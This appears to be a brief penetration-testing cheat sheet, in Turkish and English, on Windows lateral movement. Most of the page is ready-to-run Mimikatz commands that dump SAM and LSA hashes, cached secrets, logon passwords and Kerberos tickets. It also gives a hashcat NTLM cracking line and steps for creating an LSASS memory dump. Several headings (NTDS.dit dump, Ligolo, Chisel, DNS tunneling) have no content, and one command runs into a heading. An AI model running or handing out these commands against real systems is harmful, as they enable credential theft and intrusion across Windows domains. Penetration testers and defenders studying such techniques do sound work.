Windows Lateral Movement
Mimikatz
Link: https://github.com/ParrotSec/mimikatz
# Local User Hashlerini verir
./mimikatz.exe "token::elevate" "lsadump::sam" "exit"
# LSA hashlerini verir
./mimikatz.exe "token::elevate" "lsadump::lsa /patch" "exit"
# Cachelenmiş credentiallar
./mimikatz.exe "token::elevate" "lsadump::secrets" "exit"
# Oturum açan kullanıcıların hashlerini verir
./mimikatz.exe "token::elevate" "sekurlsa::logonpasswords" "exit"
./mimikatz.exe "token::elevate" "sekurlsa::tickets" "exit"
privilege::debug # Yetki kontrolü
token::elevate # Yetki yükseltme
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forceLSADump
Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file
Hash Dumping
NTDS.Dit Dump (Domain Controller)
Ligolo
Chisel
Port Forwarding
DNS Tunneling
Last updated